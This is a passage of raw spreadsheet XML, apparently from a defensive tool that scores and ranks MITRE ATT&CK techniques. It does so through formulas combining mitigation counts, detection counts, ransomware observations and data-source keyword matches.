        <f t="array" ref="AD287">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC287)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE287" s="25">
        <f>IF(AD287="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF287" s="25" t="str" cm="1">
        <f t="array" ref="AF287">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC287)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG287" s="25">
        <f>IF(AF287="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH287" s="25" t="str" cm="1">
        <f t="array" ref="AH287">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC287)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI287" s="25">
        <f>IF(AH287="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ287" s="25" t="str" cm="1">
        <f t="array" ref="AJ287">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC287)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK287" s="25">
        <f>IF(AJ287="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL287" s="25" t="str" cm="1">
        <f t="array" ref="AL287">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC287)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM287" s="25">
        <f>IF(AL287="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN287" s="60">
        <v>0</v>
      </c>
      <c r="AO287" s="51">
        <v>0</v>
      </c>
      <c r="AP287" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3566666666666661E-2</v>
      </c>
      <c r="AQ287" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11188888888888888</v>
      </c>
      <c r="AR287" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11188888888888888</v>
      </c>
      <c r="AS287" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT287" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU28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88" spans="1:47" ht="32.1">
      <c r="A288" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.5238095238095237E-2</v>
      </c>
      <c r="B288" s="25">
        <f>SUM(H288,M288,V288)*(1+SUM(AE288,AG288,AI288,AK288,AM288))</f>
        <v>0.25238095238095237</v>
      </c>
      <c r="C288" s="25" t="s">
        <v>1204</v>
      </c>
      <c r="D288" s="25" t="s">
        <v>245</v>
      </c>
      <c r="E288" s="25" t="s">
        <v>675</v>
      </c>
      <c r="F288" s="51">
        <v>1</v>
      </c>
      <c r="G288" s="51">
        <v>1</v>
      </c>
      <c r="H288" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I288">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J288">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K288">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L288">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M288" s="25">
        <v>0</v>
      </c>
      <c r="N288" s="51">
        <v>0</v>
      </c>
      <c r="O288" s="51">
        <v>0</v>
      </c>
      <c r="P288" s="51">
        <v>0</v>
      </c>
      <c r="Q288" s="51">
        <v>0</v>
      </c>
      <c r="R288" s="52" t="s">
        <v>1111</v>
      </c>
      <c r="S288" s="51">
        <v>10</v>
      </c>
      <c r="T288" s="51" t="s">
        <v>1205</v>
      </c>
      <c r="U288" s="51">
        <v>6</v>
      </c>
      <c r="V288" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15238095238095239</v>
      </c>
      <c r="W288">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X288">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y288">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z288">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA288">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB288">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC288" s="29" t="s">
        <v>178</v>
      </c>
      <c r="AD288" s="25" t="str" cm="1">
        <f t="array" ref="AD288">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC288)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE288" s="25">
        <f>IF(AD288="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF288" s="25" t="str" cm="1">
        <f t="array" ref="AF288">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC288)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG288" s="25">
        <f>IF(AF288="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH288" s="25" t="str" cm="1">
        <f t="array" ref="AH288">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC288)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI288" s="25">
        <f>IF(AH288="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ288" s="25" t="str" cm="1">
        <f t="array" ref="AJ288">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC288)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK288" s="25">
        <f>IF(AJ288="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL288" s="25" t="str" cm="1">
        <f t="array" ref="AL288">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC288)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM288" s="25">
        <f>IF(AL288="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN288" s="52">
        <v>0</v>
      </c>
      <c r="AO288" s="51">
        <v>0</v>
      </c>
      <c r="AP288" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.5238095238095237E-2</v>
      </c>
      <c r="AQ288" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.412698412698412E-2</v>
      </c>
      <c r="AR288" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.412698412698412E-2</v>
      </c>
      <c r="AS288" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT288" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU28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89" spans="1:47" ht="80.099999999999994">
      <c r="A289" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.13356666666666667</v>
      </c>
      <c r="B289" s="25">
        <f>SUM(H289,M289,V289)*(1+SUM(AE289,AG289,AI289,AK289,AM289))</f>
        <v>0.33566666666666667</v>
      </c>
      <c r="C289" s="25" t="s">
        <v>1206</v>
      </c>
      <c r="D289" s="25" t="s">
        <v>414</v>
      </c>
      <c r="E289" s="25" t="s">
        <v>1207</v>
      </c>
      <c r="F289" s="51">
        <v>1</v>
      </c>
      <c r="G289" s="51">
        <v>1</v>
      </c>
      <c r="H289" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I289">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J289">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K289">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L289">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M289" s="25">
        <v>0</v>
      </c>
      <c r="N289" s="51">
        <v>0</v>
      </c>
      <c r="O289" s="51">
        <v>4</v>
      </c>
      <c r="P289" s="51">
        <v>0</v>
      </c>
      <c r="Q289" s="51">
        <v>0</v>
      </c>
      <c r="R289" s="52" t="s">
        <v>161</v>
      </c>
      <c r="S289" s="51">
        <v>7</v>
      </c>
      <c r="T289" s="51" t="s">
        <v>415</v>
      </c>
      <c r="U289" s="51">
        <v>7</v>
      </c>
      <c r="V289" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15238095238095237</v>
      </c>
      <c r="W289">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X289">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y289">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z289">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA289">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB289">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC289" s="29" t="s">
        <v>1208</v>
      </c>
      <c r="AD289" s="25" t="str" cm="1">
        <f t="array" ref="AD289">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC289)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE289" s="25">
        <f>IF(AD289="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF289" s="25" t="str" cm="1">
        <f t="array" ref="AF289">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC289)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG289" s="25">
        <f>IF(AF289="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH289" s="25" t="str" cm="1">
        <f t="array" ref="AH289">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC289)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI289" s="25">
        <f>IF(AH289="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ289" s="25" t="str" cm="1">
        <f t="array" ref="AJ289">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC289)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK289" s="25">
        <f>IF(AJ289="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL289" s="25" t="str" cm="1">
        <f t="array" ref="AL289">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC289)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM289" s="25">
        <f>IF(AL289="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN289" s="52">
        <v>3</v>
      </c>
      <c r="AO289" s="51">
        <v>1</v>
      </c>
      <c r="AP289" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.13356666666666667</v>
      </c>
      <c r="AQ289" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11188888888888888</v>
      </c>
      <c r="AR289" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11188888888888888</v>
      </c>
      <c r="AS289" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT289" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU28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90" spans="1:47">
      <c r="A290" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.5236190476190474E-2</v>
      </c>
      <c r="B290" s="25">
        <f>SUM(H290,M290,V290)*(1+SUM(AE290,AG290,AI290,AK290,AM290))</f>
        <v>0.28569523809523811</v>
      </c>
      <c r="C290" s="25" t="s">
        <v>1209</v>
      </c>
      <c r="D290" s="25" t="s">
        <v>414</v>
      </c>
      <c r="E290" s="25" t="s">
        <v>1210</v>
      </c>
      <c r="F290" s="51">
        <v>1</v>
      </c>
      <c r="G290" s="51">
        <v>1</v>
      </c>
      <c r="H290" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I290">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J290">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K290">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L290">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M290" s="25">
        <v>0</v>
      </c>
      <c r="N290" s="51">
        <v>0</v>
      </c>
      <c r="O290" s="51">
        <v>4</v>
      </c>
      <c r="P290" s="51">
        <v>0</v>
      </c>
      <c r="Q290" s="51">
        <v>0</v>
      </c>
      <c r="R290" s="52" t="s">
        <v>161</v>
      </c>
      <c r="S290" s="51">
        <v>7</v>
      </c>
      <c r="T290" s="51" t="s">
        <v>415</v>
      </c>
      <c r="U290" s="51">
        <v>7</v>
      </c>
      <c r="V290" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15238095238095237</v>
      </c>
      <c r="W290">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X290">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y290">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z290">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA290">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB290">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC290" s="29" t="s">
        <v>1211</v>
      </c>
      <c r="AD290" s="25" t="str" cm="1">
        <f t="array" ref="AD290">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC290)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE290" s="25">
        <f>IF(AD290="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF290" s="25" t="str" cm="1">
        <f t="array" ref="AF290">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC290)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG290" s="25">
        <f>IF(AF290="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH290" s="25" t="str" cm="1">
        <f t="array" ref="AH290">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC290)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI290" s="25">
        <f>IF(AH290="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ290" s="25" t="str" cm="1">
        <f t="array" ref="AJ290">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC290)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK290" s="25">
        <f>IF(AJ290="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL290" s="25" t="str" cm="1">
        <f t="array" ref="AL290">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC290)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM290" s="25">
        <f>IF(AL290="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN290" s="60">
        <v>2</v>
      </c>
      <c r="AO290" s="51">
        <v>1</v>
      </c>
      <c r="AP290" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.5236190476190474E-2</v>
      </c>
      <c r="AQ290" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.5231746031746042E-2</v>
      </c>
      <c r="AR290" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.5231746031746042E-2</v>
      </c>
      <c r="AS290" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT290" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU29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91" spans="1:47" ht="32.1">
      <c r="A291" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.1902857142857148E-2</v>
      </c>
      <c r="B291" s="25">
        <f>SUM(H291,M291,V291)*(1+SUM(AE291,AG291,AI291,AK291,AM291))</f>
        <v>0.28569523809523811</v>
      </c>
      <c r="C291" s="25" t="s">
        <v>1212</v>
      </c>
      <c r="D291" s="25" t="s">
        <v>1213</v>
      </c>
      <c r="E291" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F291" s="51">
        <v>1</v>
      </c>
      <c r="G291" s="51">
        <v>1</v>
      </c>
      <c r="H291" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I291">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J291">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K291">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L291">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M291" s="25">
        <v>0</v>
      </c>
      <c r="N291" s="51">
        <v>0</v>
      </c>
      <c r="O291" s="51">
        <v>1</v>
      </c>
      <c r="P291" s="51">
        <v>0</v>
      </c>
      <c r="Q291" s="51">
        <v>3</v>
      </c>
      <c r="R291" s="52" t="s">
        <v>1214</v>
      </c>
      <c r="S291" s="51">
        <v>6</v>
      </c>
      <c r="T291" s="52" t="s">
        <v>1215</v>
      </c>
      <c r="U291" s="51">
        <v>8</v>
      </c>
      <c r="V291" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15238095238095237</v>
      </c>
      <c r="W291">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X291">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y291">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z291">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA291">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB291">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC291" s="29" t="s">
        <v>1216</v>
      </c>
      <c r="AD291" s="25" t="str" cm="1">
        <f t="array" ref="AD291">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC291)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE291" s="25">
        <f>IF(AD291="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF291" s="25" t="str" cm="1">
        <f t="array" ref="AF291">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC291)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG291" s="25">
        <f>IF(AF291="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH291" s="25" t="str" cm="1">
        <f t="array" ref="AH291">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC291)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI291" s="25">
        <f>IF(AH291="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ291" s="25" t="str" cm="1">
        <f t="array" ref="AJ291">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC291)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK291" s="25">
        <f>IF(AJ291="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL291" s="25" t="str" cm="1">
        <f t="array" ref="AL291">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC291)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM291" s="25">
        <f>IF(AL291="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN291" s="60">
        <v>1</v>
      </c>
      <c r="AO291" s="51">
        <v>1</v>
      </c>
      <c r="AP291" s="25">
